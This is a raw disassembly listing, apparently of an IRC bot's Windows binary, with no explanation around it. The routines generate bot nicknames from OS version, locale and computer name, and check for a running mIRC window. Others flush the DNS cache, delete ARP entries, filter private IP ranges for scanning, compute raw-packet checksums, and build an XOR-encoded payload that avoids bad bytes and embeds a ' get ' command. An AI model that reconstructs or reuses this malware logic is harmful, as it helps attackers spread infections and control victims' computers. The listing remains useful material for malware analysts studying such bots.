add esp, 20h
loc_40ACE0: ; CODE XREF: sub_40AA90+222�j
cmp dword_4E3210, esi
jz short loc_40AD14
push dword_4E3214
lea eax, [ebp+Dest]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AD14: ; CODE XREF: sub_40AA90+256�j
cmp dword_4E3218, esi
jz short loc_40AD48
push dword_4E321C
lea eax, [ebp+Dest]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AD48: ; CODE XREF: sub_40AA90+28A�j
cmp dword_4E3220, esi
jz short loc_40AD7C
push dword_4E3224
lea eax, [ebp+Dest]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 20h
loc_40AD7C: ; CODE XREF: sub_40AA90+2BE�j
lea eax, [ebp+Dest]
push offset asc_44422C ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40ADA9
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_40ADA9: ; CODE XREF: sub_40AA90+302�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40AA90 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20h
cmp dword ptr [ebp+8], 0
push esi
jz loc_40AE50
push offset dword_4E323C
push dword ptr [ebp+8]
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40AE50
push 20h
lea eax, [ebp-20h]
push dword ptr [ebp+8]
push eax
call _strncpy
lea eax, [ebp-20h]
push offset a__9 ; "."
push eax
call _strtok
add esp, 14h
test eax, eax
jz short loc_40AE50
push eax
call _atoi
mov dword ptr [esp], offset a__10 ; "."
push 0
mov esi, eax
call _strtok
pop ecx
test eax, eax
pop ecx
jz short loc_40AE50
push eax
call _atoi
cmp esi, 0Ah
pop ecx
jz short loc_40AE4B
cmp esi, 0ACh
jnz short loc_40AE3C
cmp eax, 0Fh
jle short loc_40AE50
cmp eax, 20h
jl short loc_40AE4B
loc_40AE3C: ; CODE XREF: .text:0040AE30�j
cmp esi, 0C0h
jnz short loc_40AE50
cmp eax, 0A8h
jnz short loc_40AE50
loc_40AE4B: ; CODE XREF: .text:0040AE28�j
; .text:0040AE3A�j
push 1
pop eax
jmp short loc_40AE52
; ---------------------------------------------------------------------------
loc_40AE50: ; CODE XREF: .text:0040ADC6�j
; .text:0040ADDD�j ...
xor eax, eax
loc_40AE52: ; CODE XREF: .text:0040AE4E�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AE55 proc near ; CODE XREF: sub_4019E7+4F�p
; sub_401CC7+5D16�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40AE7D
push [esp+arg_0]
call dword_4E317C ; gethostbyname
test eax, eax
jnz short loc_40AE76
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AE76: ; CODE XREF: sub_40AE55+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40AE7D: ; CODE XREF: sub_40AE55+D�j
retn
sub_40AE55 endp
; =============== S U B R O U T I N E =======================================
sub_40AE7E proc near ; CODE XREF: sub_4019E7+D6�p
mov ecx, dword_4E3014
xor eax, eax
test ecx, ecx
jz short locret_40AE8C
call ecx ; DnsFlushResolverCache
locret_40AE8C: ; CODE XREF: sub_40AE7E+A�j
retn
sub_40AE7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE8D proc near ; CODE XREF: sub_401CC7:loc_404148�p
Dest = byte ptr -88h
Size = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+Size]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+Size], edi
mov [ebp+var_4], ebx
call dword_4E3174 ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AF59
sub ecx, 32h
jz loc_40AF52
sub ecx, 48h
jz short loc_40AEED
sub ecx, 6Eh
jz short loc_40AEE6
push eax
push offset asc_444304 ; "-"
loc_40AED5: ; CODE XREF: sub_40AE8D+91�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_40AF33
; ---------------------------------------------------------------------------
loc_40AEE6: ; CODE XREF: sub_40AE8D+40�j
push offset unk_4442B0
jmp short loc_40AF25
; ---------------------------------------------------------------------------
loc_40AEED: ; CODE XREF: sub_40AE8D+3B�j
push [ebp+Size] ; Size
call _malloc
push [ebp+Size] ; Size
mov esi, eax
push edi ; Val
push esi ; Dst
call _memset
add esp, 10h
cmp esi, edi
jz short loc_40AF20
lea eax, [ebp+Size]
push ebx
push eax
push esi
call dword_4E3174 ; GetIpNetTable
cmp eax, edi
jz short loc_40AF59
push eax
push offset unk_444254
jmp short loc_40AED5
; ---------------------------------------------------------------------------
loc_40AF20: ; CODE XREF: sub_40AE8D+79�j
push offset asc_444280 ; "-"
loc_40AF25: ; CODE XREF: sub_40AE8D+5E�j
; sub_40AE8D+CA�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40AF33: ; CODE XREF: sub_40AE8D+57�j
lea eax, [ebp+Dest]
mov [ebp+var_4], edi
push eax
call sub_415C3F
pop ecx
loc_40AF43: ; CODE XREF: sub_40AE8D+CE�j
; sub_40AE8D+E2�j
push esi ; Memory
call _free
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AF52: ; CODE XREF: sub_40AE8D+32�j
push offset unk_4442D4
jmp short loc_40AF25
; ---------------------------------------------------------------------------
loc_40AF59: ; CODE XREF: sub_40AE8D+29�j
; sub_40AE8D+89�j
cmp [esi], edi
jbe short loc_40AF43
lea ebx, [esi+4]
loc_40AF60: ; CODE XREF: sub_40AE8D+E0�j
push ebx
call dword_4E3170 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AF60
jmp short loc_40AF43
sub_40AE8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF71 proc near ; CODE XREF: sub_401CC7+2238�p
; sub_401CC7+2389�p ...
Dst = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4E309C ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset byte_4E3228
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push esi ; Dest
call _sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AF71 endp
; =============== S U B R O U T I N E =======================================
sub_40AFCA proc near ; CODE XREF: .text:0040C831�p
; sub_413589+24C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40AFF3
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40AFE6: ; CODE XREF: sub_40AFCA+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40AFE6
pop edi
jmp short loc_40AFF7
; ---------------------------------------------------------------------------
loc_40AFF3: ; CODE XREF: sub_40AFCA+A�j
mov edx, [esp+4+arg_0]
loc_40AFF7: ; CODE XREF: sub_40AFCA+27�j
test esi, esi
pop esi
jz short loc_40B001
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40B001: ; CODE XREF: sub_40AFCA+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40AFCA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Ch]
mov edx, [ebp+8]
push esi
xor esi, esi
cmp eax, 1
mov [ebp-4], esi
jle short loc_40B044
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_40B036: ; CODE XREF: .text:0040B03E�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_40B036
pop edi
cmp eax, 1
loc_40B044: ; CODE XREF: .text:0040B02A�j
jnz short loc_40B051
mov al, [edx]
mov [ebp-4], al
movzx eax, word ptr [ebp-4]
add esi, eax
loc_40B051: ; CODE XREF: .text:loc_40B044�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
leave
retn
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B06A(char *Dest)
sub_40B06A proc near ; CODE XREF: sub_40B44F+49�p
; DATA XREF: .data:off_444350�o
Dest = dword ptr 4
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+8+Dest]
push off_4443B8[edx*4]
push offset aS_37 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43F098, esi
jle short loc_40B0D2
loc_40B0AC: ; CODE XREF: sub_40B06A+66�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_3 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43F098
jl short loc_40B0AC
loc_40B0D2: ; CODE XREF: sub_40B06A+40�j
mov eax, edi
pop edi
pop esi
retn
sub_40B06A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B0D7(char *Dest)
sub_40B0D7 proc near ; DATA XREF: .data:00444364�o
var_C = dword ptr -0Ch
Dest = dword ptr 4
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
mov edi, [esp+0Ch+Dest]
mov [esp+0Ch+var_C], offset asc_43F134 ; "-"
push offset aS_38 ; "%s"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43F098, esi
jle short loc_40B130
loc_40B10A: ; CODE XREF: sub_40B0D7+57�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_4 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43F098
jl short loc_40B10A
loc_40B130: ; CODE XREF: sub_40B0D7+31�j
mov eax, edi
pop edi
pop esi
retn
sub_40B0D7 endp
; =============== S U B R O U T I N E =======================================
sub_40B135 proc near ; CODE XREF: sub_401CC7+6A4D�p
; DATA XREF: .data:00444378�o
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
push 3
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_43F098
test esi, esi
jle short loc_40B178
loc_40B162: ; CODE XREF: sub_40B135+41�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40B162
loc_40B178: ; CODE XREF: sub_40B135+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B135 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B182(char *Dest)
sub_40B182 proc near ; DATA XREF: .data:0044438C�o
var_4 = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, offset aPc ; "PC"
mov [ebp+var_4], 100h
xor edi, edi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4F5394 ; GetComputerNameA
test eax, eax
jnz short loc_40B1B7
mov esi, offset aPc_0 ; "PC"
loc_40B1B7: ; CODE XREF: sub_40B182+2E�j
movsx eax, byte ptr [esi]
push 41h
pop ecx
loc_40B1BD: ; CODE XREF: sub_40B182+46�j
cmp eax, ecx
jnz short loc_40B1C4
push 1
pop edi
loc_40B1C4: ; CODE XREF: sub_40B182+3D�j
inc ecx
cmp ecx, 5Bh
jl short loc_40B1BD
push 61h
pop ecx
loc_40B1CD: ; CODE XREF: sub_40B182+56�j
cmp eax, ecx
jnz short loc_40B1D4
push 1
pop edi
loc_40B1D4: ; CODE XREF: sub_40B182+4D�j
inc ecx
cmp ecx, 7Bh
jl short loc_40B1CD
test edi, edi
jnz short loc_40B1E3
mov esi, offset aPc_1 ; "PC"
loc_40B1E3: ; CODE XREF: sub_40B182+5A�j
mov edi, [ebp+Dest]
push esi ; Format
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 0Ch
cmp dword_43F098, esi
jle short loc_40B222
loc_40B1FC: ; CODE XREF: sub_40B182+9E�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_0 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43F098
jl short loc_40B1FC
loc_40B222: ; CODE XREF: sub_40B182+78�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B182 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B228(char *Dest)
sub_40B228 proc near ; DATA XREF: .data:004443A0�o
var_C = byte ptr -0Ch
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
lea eax, [ebp+var_C]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4F5398 ; GetLocaleInfoA
mov edi, [ebp+Dest]
lea eax, [ebp+var_C]
push eax
push offset aS_22 ; "%s|"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43F098, esi
jle short loc_40B297
loc_40B271: ; CODE XREF: sub_40B228+6D�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_1 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43F098
jl short loc_40B271
loc_40B297: ; CODE XREF: sub_40B228+47�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B228 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B29D(char *Dest)
sub_40B29D proc near ; DATA XREF: .data:004443B4�o
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp+var_94]
push edi
push eax
mov esi, offset dword_4E3244
mov [ebp+var_94], 94h
call ds:dword_4F539C ; GetVersionExA
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
cmp [ebp+var_90], 4
pop ecx
jnz short loc_40B321
cmp [ebp+var_8C], 0
jnz short loc_40B301
cmp [ebp+var_84], 1
jnz short loc_40B2F1
mov esi, offset a95 ; "95"
loc_40B2F1: ; CODE XREF: sub_40B29D+4D�j
cmp [ebp+var_84], 2
jnz short loc_40B35D
mov esi, offset aNt ; "NT"
jmp short loc_40B35D
; ---------------------------------------------------------------------------
loc_40B301: ; CODE XREF: sub_40B29D+44�j
cmp [ebp+var_8C], 0Ah
jnz short loc_40B311
mov esi, offset a98 ; "98"
jmp short loc_40B35D
; ---------------------------------------------------------------------------
loc_40B311: ; CODE XREF: sub_40B29D+6B�j
cmp [ebp+var_8C], 5Ah
jnz short loc_40B358
mov esi, offset aMe_0 ; "ME"
jmp short loc_40B35D
; ---------------------------------------------------------------------------
loc_40B321: ; CODE XREF: sub_40B29D+3B�j
cmp [ebp+var_90], 5
jnz short loc_40B358
cmp [ebp+var_8C], 0
jnz short loc_40B33A
mov esi, offset a2k ; "2K"
jmp short loc_40B35D
; ---------------------------------------------------------------------------
loc_40B33A: ; CODE XREF: sub_40B29D+94�j
cmp [ebp+var_8C], 1
jnz short loc_40B34A
mov esi, offset aXp ; "XP"
jmp short loc_40B35D
; ---------------------------------------------------------------------------
loc_40B34A: ; CODE XREF: sub_40B29D+A4�j
cmp [ebp+var_8C], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40B35D
loc_40B358: ; CODE XREF: sub_40B29D+7B�j
; sub_40B29D+8B�j
mov esi, offset a??? ; "???"
loc_40B35D: ; CODE XREF: sub_40B29D+5B�j
; sub_40B29D+62�j ...
mov edi, [ebp+Dest]
push esi
push offset aS_23 ; "[%s]|"
push 1Ch ; Count
push edi ; Dest
call __snprintf
xor esi, esi
add esp, 10h
cmp dword_43F098, esi
jle short loc_40B3A1
loc_40B37B: ; CODE XREF: sub_40B29D+102�j
call _rand
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset aSI_2 ; "%s%i"
push 1Ch ; Count
push edi ; Dest
call __snprintf
add esp, 14h
inc esi
cmp esi, dword_43F098
jl short loc_40B37B
loc_40B3A1: ; CODE XREF: sub_40B29D+DC�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40B29D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B3A7(char *Dest)
sub_40B3A7 proc near ; CODE XREF: sub_40B44F+5C�p
Source = byte ptr -1Ch
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
mov esi, eax
cmp esi, 64h
jbe short loc_40B3F6
push offset aMirc_0 ; "mIRC"
call dword_4E3104 ; FindWindowA
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40B3DF
mov eax, offset dword_4E3248
loc_40B3DF: ; CODE XREF: sub_40B3A7+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_40B41B
; ---------------------------------------------------------------------------
loc_40B3F6: ; CODE XREF: sub_40B3A7+1D�j
push offset aMirc_1 ; "mIRC"
call dword_4E3104 ; FindWindowA
test eax, eax
mov eax, offset aM_1 ; "[M]"
jnz short loc_40B40F
mov eax, offset dword_4E324C
loc_40B40F: ; CODE XREF: sub_40B3A7+61�j
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40B41B: ; CODE XREF: sub_40B3A7+4D�j
lea eax, [ebp+Source]
push eax ; Str
call _strlen
pop ecx
cmp eax, 2
pop esi
jbe short loc_40B44A
push 1Ch ; Count
lea eax, [ebp+Source]
push [ebp+Dest] ; Source
push eax ; Dest
call _strncat
lea eax, [ebp+Source]
push 1Ch ; Count
push eax ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 18h
loc_40B44A: ; CODE XREF: sub_40B3A7+82�j
mov eax, [ebp+Dest]
leave
retn
sub_40B3A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B44F(char *Dest,int,int,char *Str1)
sub_40B44F proc near ; CODE XREF: sub_4019E7+7F�p
; sub_401B4F+50�p ...
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str1 = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_44434C
loc_40B45B: ; CODE XREF: sub_40B44F+3F�j
cmp [ebp+Str1], 0
jz short loc_40B476
lea eax, [esi-0Ch]
push eax ; Str2
push [ebp+Str1] ; Str1
call _strcmp
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B480
; ---------------------------------------------------------------------------
loc_40B476: ; CODE XREF: sub_40B44F+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40B480: ; CODE XREF: sub_40B44F+25�j
test eax, eax
jnz short loc_40B492
add esi, 14h
inc edi
cmp esi, offset off_4443C4
jb short loc_40B45B
jmp short loc_40B4A0
; ---------------------------------------------------------------------------
loc_40B492: ; CODE XREF: sub_40B44F+33�j
push [ebp+Dest] ; Dest
lea eax, [edi+edi*4]
call off_444350[eax*4]
pop ecx
loc_40B4A0: ; CODE XREF: sub_40B44F+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40B4B3
push [ebp+Dest] ; Dest
call sub_40B3A7
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B4B3: ; CODE XREF: sub_40B44F+57�j
mov eax, [ebp+Dest]
pop ebp
retn
sub_40B44F endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B4B8(char *Str,int)
sub_40B4B8 proc near ; CODE XREF: sub_40B4D8+A�p
; sub_40B5B0+8�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+Str] ; Str
call _strlen
push [esp+8+arg_4] ; Str
mov esi, eax
call _strlen
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_40B4B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B4D8(void *Dst,int,char *Src,int)
sub_40B4D8 proc near ; CODE XREF: .text:0040B610�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C] ; int
push [ebp+Src] ; Str
call sub_40B4B8
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40B4F5
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B4F5: ; CODE XREF: sub_40B4D8+17�j
push ebx
push esi
push edi
push [ebp+Src] ; Str
call _strlen
push [ebp+arg_C] ; Str
mov esi, eax
call _strlen
mov edi, eax
mov ebx, [ebp+Dst]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_44813C, eax
lea eax, [edi+1]
mov dword_44815D, eax
lea eax, [edi+17h]
mov dword_448155, eax
pop eax
push 74h ; Size
sub eax, edi
push offset dword_4480D8 ; Src
push ebx ; Dst
mov dword_44816B, eax
call _memcpy
push esi ; Size
lea eax, [ebx+74h]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esi, 74h
push 5 ; Size
push offset aGet ; " get "
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, 5
push edi ; Size
push [ebp+arg_C] ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esi, edi
push 10h ; Size
push (offset aGet+5) ; Src
lea eax, [esi+ebx]
push eax ; Dst
call _memcpy
add esp, 44h
add esi, 10h
push edi ; Size
lea eax, [esi+ebx]
push [ebp+arg_C] ; Src
push eax ; Dst
call _memcpy
add esi, edi
push 38h ; Size
add esi, ebx
push offset byte_448161 ; Src
push esi ; Dst
call _memcpy
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B4D8 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40B5B0(char *Str,int)
sub_40B5B0 proc near ; CODE XREF: .text:0040B5D4�p
Str = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+Str] ; Str
call sub_40B4B8
push eax
call sub_40B634
add esp, 0Ch
retn
sub_40B5B0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+10h]
push edi
mov edi, [ebp+14h]
push edi
push ebx
call sub_40B5B0
cmp eax, [ebp+0Ch]
pop ecx
pop ecx
ja short loc_40B5E7
cmp eax, 0FFFFh
jbe short loc_40B5EB
loc_40B5E7: ; CODE XREF: .text:0040B5DE�j
xor eax, eax
jmp short loc_40B630
; ---------------------------------------------------------------------------
loc_40B5EB: ; CODE XREF: .text:0040B5E5�j
push esi
push edi
push ebx
call sub_40B4B8
add eax, 101h
push eax
call _malloc
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_40B4B8
pop ecx
pop ecx
push eax
push esi
call sub_40B4D8
push eax
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40B64F
push esi
mov edi, eax
call _free
add esp, 24h
mov eax, edi
pop esi
loc_40B630: ; CODE XREF: .text:0040B5E9�j
pop edi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_40B634 proc near ; CODE XREF: sub_40B5B0+E�p
; sub_40B64F+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B63D
inc ecx
loc_40B63D: ; CODE XREF: sub_40B634+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B634 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40B64F(void *Dst,int,int,int)
sub_40B64F proc near ; CODE XREF: .text:0040B61D�p
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_40B66B
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_40B66B
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_40B66B
cmp byte ptr [ebp+arg_C], 0
jnz short loc_40B66E
loc_40B66B: ; CODE XREF: sub_40B64F+8�j
; sub_40B64F+E�j ...
inc [ebp+arg_C]
loc_40B66E: ; CODE XREF: sub_40B64F+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_40B696
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_40B68F
cmp al, 0Dh
jz short loc_40B68F
cmp al, 5Ch
jz short loc_40B68F
test al, al
jnz short loc_40B696
loc_40B68F: ; CODE XREF: sub_40B64F+32�j
; sub_40B64F+36�j ...
add [ebp+arg_C], 100h
loc_40B696: ; CODE XREF: sub_40B64F+28�j
; sub_40B64F+3E�j
push [ebp+arg_C]
call sub_40B634
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B6AE
cmp eax, 0FFFFh
jbe short loc_40B6B5
loc_40B6AE: ; CODE XREF: sub_40B64F+56�j
xor eax, eax
jmp loc_40B753
; ---------------------------------------------------------------------------
loc_40B6B5: ; CODE XREF: sub_40B64F+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_4E3250
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_40B6E5
loc_40B6C9: ; CODE XREF: sub_40B64F+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_40B6DC
cmp al, 0Ah
jz short loc_40B6DC
cmp al, 0Dh
jz short loc_40B6DC
cmp al, 5Ch
jnz short loc_40B6E0
loc_40B6DC: ; CODE XREF: sub_40B64F+7F�j
; sub_40B64F+83�j ...
inc bl
xor edx, edx
loc_40B6E0: ; CODE XREF: sub_40B64F+8B�j
inc edx
cmp edx, ecx
jb short loc_40B6C9
loc_40B6E5: ; CODE XREF: sub_40B64F+78�j
cmp ecx, esi
mov byte_4E3250, bl
ja short loc_40B711
push 15h ; Size
push offset dword_4480C0 ; Src
push [ebp+Dst] ; Dst
mov byte_4480CD, cl
mov byte_4480D1, bl
call _memcpy
add esp, 0Ch
push 15h
jmp short loc_40B732
; ---------------------------------------------------------------------------
loc_40B711: ; CODE XREF: sub_40B64F+9E�j
push 17h ; Size
push offset dword_4480A8 ; Src
push [ebp+Dst] ; Dst
mov word_4480B6, cx
mov byte_4480BB, bl
call _memcpy
add esp, 0Ch
push 17h
loc_40B732: ; CODE XREF: sub_40B64F+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B74E
mov edx, [ebp+Dst]
lea esi, [ecx+edx]
loc_40B740: ; CODE XREF: sub_40B64F+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B740
loc_40B74E: ; CODE XREF: sub_40B64F+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B753: ; CODE XREF: sub_40B64F+61�j
pop esi
leave
retn
sub_40B64F endp
; =============== S U B R O U T I N E =======================================
